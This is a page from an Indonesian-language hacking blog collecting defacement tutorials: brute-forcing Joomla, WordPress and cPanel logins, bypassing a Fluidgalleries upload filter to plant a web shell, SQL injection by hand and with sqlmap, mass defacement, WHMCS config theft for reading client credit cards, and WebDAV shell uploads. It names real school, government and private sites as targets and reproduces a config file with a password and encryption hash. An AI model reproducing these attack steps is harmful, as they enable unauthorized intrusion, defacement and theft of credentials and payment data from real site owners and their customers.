Artikel Terkini

Showing posts with label tutorial deface. Show all posts
Showing posts with label tutorial deface. Show all posts
Sunday, August 11, 2013

Teknik Cara Deface dengan Joomla Bruteforce.Full

Posted by gboys_flush at 2:16 PM 0 comments
Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p




Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...


Tinggal nunggu hasilnya  :) yang sabar yah :p


Kalo udah nemu password yang cocok, tinggal login dah!


Nah ternyata toolnya masih bekerja dengan baik :)


Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua
Baca Selengkapnya →

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

Posted by gboys_flush at 2:14 PM 0 comments
                       OK LANGSUNG DISEDOT AJE YA GAN. . .  :)

 Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: Lihat

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute




Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D
Baca Selengkapnya →

Cara Terbaru Crack Cpanel 2013

Posted by gboys_flush at 2:12 PM 0 comments
Saat ini udah banyak yg tau kan bagamana nanem shell di website? :D kalo belum tau, belajar lagi sono, :D soalnya kalo kagak bisa tanem shell bijimane mau crack cpanel :) oke dah, kali ini saya menulis artikel mengenai cara crack cpanel menggunakan Shell 1n73ction v.32 . Thankz to om X'Inject :D
Yup, Rata2 di blogg2 udah banyak yg share ni, makanya kita ga mau ketinggalan juga nih :D perlu diketahui, tutorial ini sedikit berbeda dengan tutorial kami sebelumnya, kalo belum tau silahkan baca lagi Cara Crack Cpanel, langsung dah meluncur :)

Sediakan bahan2nya dolo :D kayak mau masak aja :D

1. Shell 1n73ction v.32 | Download |

Pass File : http://indocyberarmy.blogspot.com
Pass Shell : 1n73ction

2. Web Shelled

3. Web Config

Yuk mari kita lanjutkan ke langkah langkahnya :D

Pertama tentunya kita harus punya web yg sudah ditanem shell :D



Kemudian disini saya juga udah punya Web Confignya :P kalo belum tau gimana nyari config, Lihat aja artikel Cara Mencari Config :p

Lalu pada Shell 1n73ction, klik Cpanel Bruteforce



Nah, ntar muncul dah toolsnya :)


Setelah itu, masukkan url yang berisikan config web di kolom Url Config, Liat gambar dibawah :)


Klik GO dan tunggu aja sampai selesai :)


Nah, kalo udah selesai, disitu ada kumpulan wordlist2 yang akan kita gunakan sebagai wordlist password, copy aja dan masukkan di kolom Pass.



Lalu klik Start dan tunggu dah sampe selesai :)


Tuh, udah dapet :) langsung dah loggin ke cpanelnya :)

Sekian Tutorial ane mudah2an bermanfaat,, thanks udah mampir :) jangan lupa komentarnya -_- :D

Content Creator : Onix AQua
Baca Selengkapnya →

Teknik Deface Exploit Fluidgalleries File Upload ( Tamper Data )

Posted by gboys_flush at 2:10 PM 0 comments
oke langsung aja yah ngak usah kelamaan basa basinya takutnya jadi basi XD

Kali ini saya akan memberikan tutorial " Deface dengan Exploit "Fluidgalleries"....

[+] LANGKAH LANGKAH [+]




  • Dork : inurl:/fluidgalleries/photos/
  • Bahan : Shell yang sudah direname menjadi shell.php.jpg
Dork kembangin sendiri OK ;)

1. Copas dork diatas ke mesin pencarian, lalu pilih salah satu target
2. Setelah memilih salah satu website gunakan exploit
  • localhost/[path]/fluidgalleries/php/photo-upload.php
~> Target saya : http://www.antarhanif.com/Stills/fluidgalleries/php/photo-upload.php
Setelah itu buka tools " Tamper Data " kalian, lalu klik start tamper 
3. Setelah itu, pilih file yang akan kalian upload ( shell.php.jpg )
4. Lalu klik OK, saat keluar pop up tools tamper data kalian klik " tamper "

5.  Setelah itu akan keluar Pop Up lagi dan perhatikan di sebelah kanan ada kotak kecil, carilah kata  shell.php.jpg lalu ganti dengan shell.php 

6. Jika sudah di renam lalu klik OK, tunggu sampai proses upload selesai jika sudah klik stop tamper


7. Untuk melihat shell kalian terupload atau belum pergi ke :
inget nanti bakalan ada embel embel di nama shell kalian, jadi setelah akses localhost/[path]/fluidgalleries/photos/ kalian ketik CTRL + F lalu tulis nama shll kalian ;)
Upload sukses ^_^
8. Tinggal tebas deh websitenya :D
sekian tutorial yang dapat saya berikan, jika ada yang kurang jelas silahkan tanyakan di kolom komentar ^_^

NB : Jika tidak bisa upload Php upload aja html :D
Thanks to : The Jackerz & Cimy
Baca Selengkapnya →

SQLi dengan python

Posted by gboys_flush at 2:08 PM 0 comments
Ok mulai dari step yang pertama..

1. Sediakan Python dapat di cari di google dengan versi 2.7.3
2. Sqlmap. Download Disini
3. Command Promt (saya gunakan Win XP)

Ok mulai tahap pertama

1. Download python serta Sqlmap nya
2. Extract rar Sqlmap lalu rename folder sqlmap dengan root ,
3. lalu pindahkan ke Drive C
4. Buka Cmd lalu ketikan seperti ini .
cd c:\root [ENTER]
sqlmap.py  
Seperti ini .
Mudahkan Mantab deh...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : 
sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database)
"Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :

6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah :
sqlmap.py -u SiteVuln -D database nya --tables ENTER , 
Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :

7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -T Tabel nya --columns
,, Oke kalo udah Enter lagi , dan lihat hasil nya :


Ea kk , jangan berbahagia dulu  soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama auntuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :

dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" .
pesen seya si sebelum di scen pakek python seken dloo pakek hevij panel adminya yaaa.

By Post : Adam Cyber
Baca Selengkapnya →

Mass Deface Website

Posted by gboys_flush at 2:07 PM 0 comments

Oke langsung aja, ini bukan mass deface server loh :P tapi cuma mass deface website yang ada di direktori aja :D

Oke langsung aja ikutin langkah berikut ini :

Bahan :



  • Mass Deface ( udah ada di shell X Inject / IDCA / etc )
  • Website yang direktorinya ada domain/web lain.
1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^
2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 
3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "
4. Keterangan :
Folder : udah biarin aja (kan kita udah di direktorinya)
File Name : nama file yang mau dibikin
Kolom Index Code : Isi dengan script deface kalian ^_^
Setelah itu klik HAJAR !!! 

Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P
Selamat mencoba :D

Content Created By : Bimo Septiawan
Baca Selengkapnya →

Cara Hacking Website Dengan Teknik SQL Injection

Posted by gboys_flush at 2:05 PM 0 comments
Pengertian SQL InjectionSQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
     Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: Hacker Newbie
Baca Selengkapnya →

Belajar Hacking Website Dari Nol

Posted by gboys_flush at 11:21 AM 0 comments
                              PENGENALAN HACKING
Hacking merupakan sebuah seni yang bisa di bilang mempunyai kedua
kekuatan antara white hacking dan black hacking, antara seni berbuat
baik dan seni berbuat jahat. Pada dasarnya hacking itu bertujuan untuk
menemukan sesuatu kelemahan pada sebuah system atau aplikasi agar kita dapat
membongkar source code di dalam system tersebut dan berhasil masuk ke dalam
system tersebut. Pada dasarnya kita dapat merubahnya namun kita tidak untuk
merusak. Kali ini kita akan mencoba membongkar sebuah keamanan website dengan
menggunakan teknik vuln system kelemahan dengan SQL injection.
Belajar hacking website dari nol anda akan di arahkan bagaimana anda yang awalnya
tidak tahu tentang dunia hacking. Dengan membaca tutorial network security ini anda
dalam waktu 1 jam saja mampu menjadi seorang hacker dan mampu melumpuhkan
sebuah website dengan menganalisa dan menerobos system kelemahannya.
Banyak kasus hacking yang beredar dan terkenal sampai saat ini salah satunya adalah
hacker cina yang berhasil men take over satelit NASA selama kurang dari 15 menit.
Selain itu situs-situs besar seperti google, facebook, amazon, ebay juga pernah
kebobolan system keamanan mereka.
Keamanan memang merupakan salah satu factor terpenting dalam sebuah system atau
aplikasi karena dengan keamanan, system atau aplikasi yang kita buat dapat bertahan
lama. Bukan berate system atau aplikasi kita sempurna karena tidak ada sebuah
system atau aplikasi yang sempurna 100%. Tujuan dari keamanan adalah memperlama
hacker merusak dari system atau aplikasi anda hingga berpuluh-puluh tahun.
Hacking memang memanfaatkan sebuah system misalnya pada jaringan, yang akan
kita bahas kali ini adalah hacking website dengan mencari vuln keamanan.
Attacker : Penyerang.
Korban : Sistem yang akan di serang.
Firewall : Sistem pelindung dari website.
Di mana attacker mencoba akan menyerang korban dengan teknik vuln pada sebuah
website yang di miliki korban. Dengan memanfaatkan celah firewall website tersebut
dan berhasil menerobos sampai halaman admin.

                                  PENGENALAN SOFTWARE
1.1 Acunetix
Acunetix merupakan sebuah program alat scaning website yang sangat popular di
dunia hacking. Kemampuannya untuk menscan secara total dari sebuah system dan
mendapatkan sebuah informasi secara mendetail. Acunetix ini juga bisa mendeteksi
kelemahan pada system aplikasi pada website, seperti vuln pada SQL Blind, SQL
Injection, Cross Sire Scripting (XSS). Dan dari acunetix ini mampu melihat isi directori
dari sebuah website dan bisa di gunakan untuk mencari halaman login website tertentu.
Kemampuannya yang begitu lengkap acunetix menjadi salah satu software favorite dari
para hacker saat ini. Saat ini acunetix sudah mencapai versi 8 dan dapat di gunakan di
windows xp, vista, 7 dan windows 8.
Download : http://www.4shared.com/rar/nlFJj71b/Acunetix.html

1.2 John The Ripper
John The Ripper merupakan salah satu alat hack paling popular dan paling lama
yang bertahan sampai saat ini. John di gunakan untuk mencrack sebuah password
yang sudah di descyript dari md5 hash, md4, dan password binary lainnya menjadi
password login bisaa. Namun untuk menjalankan John anda perlu selalu meng-update
source list password directory agar saat mendescyript password terbantu dengan cepat
namun john dapat membaca cepat anatar 1-7 password dalam hitungan menit. Namun
jika password tersebut lebih dari 7 karakter dan karakter tersebut terdiri dari beberapa
symbol, John akan lama membacannya butuh waktu berjam-jam bahkan berhari-hari.
Download : http://www.4shared.com/zip/uvg9GqSx/John_The_Ripper.html


1.3 Havij 1.15 Pro
Havij 1.15 Pro merupakan alat pembaca isi dari daleman suatu database dengan
havij kita bisa mendapatkan informasi database baik itu menggunakan sql, oracle, ms
access, postgre sql, sybase. Havij sendiri memang tools hacking yang simple dan
mudah di gunakan, selain itu di havij mempunyai fitur simpan yang di gunakan untuk
penyimpanan dump sql yang kita dapatkan dari proses hacking.
Download : http://www.4shared.com/rar/VNv0xeAv/Havij_115_ProCrack.html

1.4 Admin Finder versi Network Security
Admin finder berfungsi untuk menemukan suatu halaman login dari sebuah
website. Admin finder ini telah di modifikasi dan sudah ada tambahan source list
halaman login dari sebuah website baik itu menggunakan php, asp, cfm. Tools ini
memang cepat dalam melakukan scaning web login pada suatu web.
Download : http://www.4shared.com/rar/qiOrYXaS/Admin.html

1.5 Active Perl
Active perl bahasa pemograman yang cukup popular saat ini, bahasa
pemograman ini banyak di kembangkan untuk pembuatan tools-tools security dan tools
hacking.
Download : http://www.activestate.com/activeperl/downloads

1.6 Perl
Perl ini sama seperti active perl hanya saja perl ini untuk menjalankan programprogram
yang berekstensi .pl seperti adminfinder.pl. Selain itu perl ini anda bisa
membuat pemograman yang berbasis pemograman perl.
Download : http://www.activestate.com/activeperl/downloads


                       Mencari Informasi Target
Untuk target yang kita lakukan testing keamanan adalah website salah satu
sekolahan di Indonesia dengan domain menggunakan .sch.id.
Target sekolah ini di ambil untuk pembelajaran karena lemahnya system keamanan
pada website tersebut. Di publikasikan untuk pembelajaran bukan untuk merusak
sebuah system.
Target : http://smpn18bkl.sch.id
Untuk scanning gunakan alat : Acunetix
Untuk pengambilan dumping password admin gunakan : Havij
Untuk memecah descyript md5 password admin menggunakan : John The Ripper
Untuk menemukan halaman login menggunakan : Adminfinder versi Network Security


Demekian tutorial yang saya buat, semoga dapat bermanfaat dan memberikan
pelajaran terhadap system keamanan website yang kita buat... good job. . .  :)
Baca Selengkapnya →
Monday, August 5, 2013

WHMCS KILLER v2.php

Posted by gboys_flush at 7:01 AM 0 comments
Udah ada yang pernah denger whmcs? atau whmpanel?
nah di tutorial kali ini, gw mo share cara menggunakan tools WHMCS KILLER
.
apa gunanya?
1. kita bisa login as admin dalam sebuah hosting dan bisa melakukan apa saja sesuka kita, contoh web target ada disana, nah kita tinggal edit cpanel lewat whmcs yang udah kita, bacaaa "HaCK" =))
2. kita bisa dapat root cuma"
3. kita bisa dapet cpanel semau kita
4. crack VPS/SERVER
5. Carding / Read clients credit card
6. dll.
.
nah pertama lu kudu punya target whmcs yg ada 1 server dengan shell kalian.
nah biasanya di web tsb, ada tempat login client/admin
biasanya nama tmpat loginnya
/clientarea, /manage, /client /developer /billing /billingclient /bill

kita kudu dapetin config whmcs tsb dengan cara apapun, contoh dengan:
1. Symlink : praktekan command ini "
ln -s/home/user/public_html/folderclient/configuration.php
2. Root server: dengan menggunakan exploit yg bisa anda temukan di google =)) lalu baca file config whmcs
3. Jumping : tapi kayanya kemungkinan 10% cz dir yg mo di read dari group laen chmodnya beda"

.
Nah klo kita udah dapet file config, ini contoh salah satu file cofig whmcs :


<?php
if(isset($_GET['licensedebug']))
{
unset($_GET['licensedebug']);
exit('Access Denied');
}
if(isset($_GET['forceremote']))
{
unset($_GET['forceremote']);
exit('Access Denied');
}
if(isset($_GET['revokelocal']))
{
unset($_GET['revokelocal']);
exit('Access Denied');
}
$license = 'Leased-d8fbbd343a2408bf7d09';
$db_host = 'localhost';
$db_username = '*****************';
$db_password = 'xS%564Ukea}|';
$db_name = '************';
$cc_encryption_hash = 'MM3hLAb9wDEUovvbwy9SSC0ElML4HfOkSHst7utuXYebjAdGYdoGFfbQRMKpSozA';
$templates_compiledir = '/home/myaccoun/whmcs_secured_folders/templates_c/';
$attachments_dir = '/home/myaccoun/whmcs_secured_folders/attachments/';
$downloads_dir = '/home/myaccoun/whmcs_secured_folders/downloads/';
$customadminpath = '__admx';
?>


nah klo udah dapet kaya begituan, kita masukin ke WHMCS KILLER.
oh ya password whmcs killernya
username: root
pass: toor
.
isikan identitas target dengan sempurna lalu klik submit....
dari situ ada menu" yg mudah dimengerti, mulai dari edit pass admin/client sampe read password cPANEL :D
DOWNLOAD HERE

Berbagi itu indah kawan....

ex : a.M.e


Baca Selengkapnya →
Monday, March 11, 2013

webdav on.pu.go.id

Posted by gboys_flush at 4:23 AM 0 comments

What's Funny ? Nothing dude :P 
Sebenarnya ini memang bug/vull lama dari microsoft. Namun bukan berarti patchnya gak update dari pihak microsoft. mungkin admin'nya aja yang lalai atau gimana, saya juga gak ngerti . hihihi ... *maaf ketawa mulu.Maklum tekhnik ini yang sering di gunakan para hacker untuk perbanyak archieve deface mereka, what ever'lah .. hahahaa !
 
# Saya akan coba jelaskan panjang lebar soal tekhnik yang satu ini . 
# Apa sih tuh WebDAV Vulnerability ? Coba cari di google aja.. hahhaaTapi secara harfiah WebDAV adalah very vulnerable component of IIS servers  
# Mari kita coba scan website pu.go.id dengan acunetix , and i got a WebDAV Vulnerability in pu.go.id Or u can use DAVtest .



# Cari direktori yang di ijinkan untuk writeabilty ( bisa untuk kita sisipin file, dsb ) Example = www.localhost.com, www.localhost.com/images, dsb

# Open windows explorer 



"add a network location"  

# Just Next step .. Ingat jika domain utama gak bisa, cari direktori yang mengijinkan kita untuk menyisipkan file

# Siapkan shell.asp, trus copy-paste shell kita to folder website victim :D 
# Jangan lupa rename shell kita menjadi : shell.asp.;jpg or shell.asp.;txt
# Tapi kita bisa menyisipkan file : .txt , html, htm dsb
----------------------------------------------- 

Mirror site : http://www.zone-h.org/mirror/id/15622271


http://aldjazara.blogspot.com
ns : 
Baca Selengkapnya →

cara upload shell dlm joomla [template]

Posted by gboys_flush at 4:14 AM 0 comments
Ok . langsung aje 
salam sejahtera semua ncang ncing enya babeh empo" yg cantik n' abang" yg ganteng... :


hari ni saya akan ajar ente cara upload shell dalam joomla mengunakan keadah Edit template

Pertama kali ente kena ada akses di dalam admininstrator yang Hostingnya Joomla o






Ok . macam biasa ente login mengunakan Username dan password yang ente telah resetkan

selepas ente login . ente akan nampak macam gambar di bawah



















Ok . sekarang ente dah dalam admin panel .

Selepas itu ente tekan "Extension" dan di dalam tu ade "Edit template"

Tekan edit template tersebut



















Ok . selepas ente klik ente akan nampak template yang di "install" dekat dalam website tersebut .













yang bertanda bintang emas tersebut adalah template yang website itu sedang gunakan















Ok . lupakan tentang bintang emas . sekarang ente klik dekat bezz . dalam kotak hijau macam gambar di atas .


Selepas itu akan keluar macam ni
















ente tekan edit template .




















Ok . di dalam kotak tu . ente amsukan code shell ente . lihat kotak merah tu . di situ shell ente akan berada

/templates/beez/index.php 























save .



















Selepas ente save . maka ente boleh buka shell ente yang berada di :


www.site.com/templates/beez/index.php


semoaga bermanfaat .. :)


Baca Selengkapnya →